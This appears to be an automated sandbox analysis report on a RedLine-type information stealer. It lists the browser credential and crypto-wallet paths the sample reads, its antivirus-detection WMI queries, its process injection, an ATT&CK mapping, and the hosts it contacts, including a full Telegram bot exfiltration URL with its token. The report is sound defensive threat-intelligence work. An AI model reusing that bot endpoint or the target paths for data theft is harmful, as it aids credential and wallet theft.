                      Source: C:\Users\user\AppData\Local\Temp\filename.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\ProgramData\Path\Path.exeQueries volume information: C:\ProgramData\Path\Path.exe VolumeInformationJump to behavior
                      Source: C:\ProgramData\Path\Path.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\ProgramData\Path\Path.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: 66dcad8f5f33a_crypted.exe, 00000000.00000002.1477328716.00000000010A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                      Source: 66dcad8f5f33a_crypted.exe, 00000000.00000002.1477328716.00000000010A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected MicroClip
                      Source: Yara matchFile source: Process Memory Space: filename.exe PID: 3672, type: MEMORYSTR
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.66dcad8f5f33a_crypted.exe.3e25570.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.66dcad8f5f33a_crypted.exe.3e25570.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.1659124190.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1477865176.0000000003E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 66dcad8f5f33a_crypted.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1264, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                      Source: Yara matchFile source: 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1264, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected MicroClip
                      Source: Yara matchFile source: Process Memory Space: filename.exe PID: 3672, type: MEMORYSTR
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.66dcad8f5f33a_crypted.exe.3e25570.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.66dcad8f5f33a_crypted.exe.3e25570.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.1659124190.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1477865176.0000000003E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 66dcad8f5f33a_crypted.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1264, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		411
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		231
                      Security Software Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		LSASS Memory1
                      Process Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
                      Virtualization/Sandbox Evasion                      		Security Account Manager241
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture1
                      Ingress Tool Transfer                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                      Obfuscated Files or Information                      		LSA Secrets1
                      File and Directory Discovery                      		SSHKeylogging3
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Install Root Certificate                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input Capture14
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Software Packing                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Timestomp                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1507478 Sample: 66dcad8f5f33a_crypted.exe Startdate: 08/09/2024 Architecture: WINDOWS Score: 100 41 pastebin.com 2->41 43 api.telegram.org 2->43 45 smkn2sumbawabesar.sch.id 2->45 63 Suricata IDS alerts for network traffic 2->63 65 Found malware configuration 2->65 67 Antivirus / Scanner detection for submitted sample 2->67 73 6 other signatures 2->73 10 66dcad8f5f33a_crypted.exe 2 2->10         started        signatures3 69 Connects to a pastebin service (likely for C&C) 41->69 71 Uses the Telegram API (likely for C&C communication) 43->71 process4 file5 37 C:\Users\...\66dcad8f5f33a_crypted.exe.log, ASCII 10->37 dropped 87 Contains functionality to inject code into remote processes 10->87 89 Writes to foreign memory regions 10->89 91 Allocates memory in foreign processes 10->91 93 Injects a PE file into a foreign processes 10->93 14 RegAsm.exe 21 25 10->14         started        19 conhost.exe 10->19         started        signatures6 process7 dnsIp8 51 5.42.92.222, 49707, 7880 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 14->51 53 smkn2sumbawabesar.sch.id 194.163.35.141, 443, 49708 NEXINTO-DE Germany 14->53 39 C:\Users\user\AppData\Local\...\filename.exe, PE32 14->39 dropped 55 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->55 57 Installs new ROOT certificates 14->57 59 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 14->59 61 2 other signatures 14->61 21 filename.exe 14 8 14->21         started        file9 signatures10 process11 dnsIp12 47 api.telegram.org 149.154.167.220, 443, 49710 TELEGRAMRU United Kingdom 21->47 49 pastebin.com 104.20.4.235, 443, 49709 CLOUDFLARENETUS United States 21->49 35 C:\ProgramData\Path\Path.exe, PE32 21->35 dropped 75 Antivirus detection for dropped file 21->75 77 Machine Learning detection for dropped file 21->77 79 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 21->79 81 Drops large PE files 21->81 26 Path.exe 1 21->26         started        29 cmd.exe 1 21->29         started        file13 signatures14 process15 signatures16 83 Antivirus detection for dropped file 26->83 85 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 26->85 31 conhost.exe 29->31         started        33 timeout.exe 1 29->33         started        process17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      66dcad8f5f33a_crypted.exe100%AviraHEUR/AGEN.1351932

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\ProgramData\Path\Path.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Local\Temp\filename.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Local\Temp\filename.exe100%Joe Sandbox ML

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://tempuri.org/Entity/Id23ResponseD0%Avira URL Cloudsafe
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text0%Avira URL Cloudsafe
                      http://tempuri.org/0%Avira URL Cloudsafe
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id14ResponseD0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha10%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id2Response0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sct0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id12Response0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id90%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id80%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id21Response0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id50%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id40%Avira URL Cloudsafe
                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id6ResponseD0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id70%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id60%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id19Response0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id24ResponseD0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%Avira URL Cloudsafe
                      http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id13ResponseD0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/fault0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/10/wsat0%Avira URL Cloudsafe
                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey0%Avira URL Cloudsafe
                      https://api.telegram.org/bot7519321746:AAGYAZdkHTqE4LvUc5fDNQGiIRvfmzNMLzk/sendDocumentT0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp90%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id15Response0%Avira URL Cloudsafe
                      http://api.telegram.orgd0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id5ResponseD0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register0%Avira URL Cloudsafe
                      https://api.telegram.org/bot7519321746:AAGYAZdkHTqE4LvUc5fDNQGiIRvfmzNMLzk/sendDocument0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id6Response0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id1ResponseD0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC0%Avira URL Cloudsafe
                      https://api.ip.sb/ip0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/04/sc0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id9Response0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id200%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id210%Avira URL Cloudsafe
                      http://pastebin.comd0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id220%Avira URL Cloudsafe
                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA10%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id230%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA10%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id240%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id24Response0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id1Response0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay0%Avira URL Cloudsafe
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id21ResponseD0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/04/trust0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id110%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id10ResponseD0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id100%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id120%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id16Response0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id130%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id140%Avira URL Cloudsafe
                      http://api.telegram.org0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id160%Avira URL Cloudsafe
                      http://pastebin.com0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id150%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id170%Avira URL Cloudsafe
                      https://pastebin.com0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id180%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id5Response0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id190%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id15ResponseD0%Avira URL Cloudsafe
                      http://smkn2sumbawabesar.sch.id0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id11ResponseD0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust/Renew0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id8Response0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id10Response0%Avira URL Cloudsafe
                      https://api.telegram.org0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      smkn2sumbawabesar.sch.id
                      		194.163.35.141
                      		truetrue
                        		unknown
                        api.telegram.org
                        		149.154.167.220
                        		truetrue
                          		unknown
                          pastebin.com
                          		104.20.4.235
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/bot7519321746:AAGYAZdkHTqE4LvUc5fDNQGiIRvfmzNMLzk/sendDocumentfalse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/sc/sctRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id14ResponseDRegAsm.exe, 0000000B.00000002.1660156451.0000000003135000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id23ResponseDRegAsm.exe, 0000000B.00000002.1660156451.00000000031B8000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id12ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id2ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id21ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id9RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id8RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id6ResponseDRegAsm.exe, 0000000B.00000002.1660156451.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id5RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id4RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id7RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id6RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id19ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id24ResponseDRegAsm.exe, 0000000B.00000002.1660156451.0000000003220000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
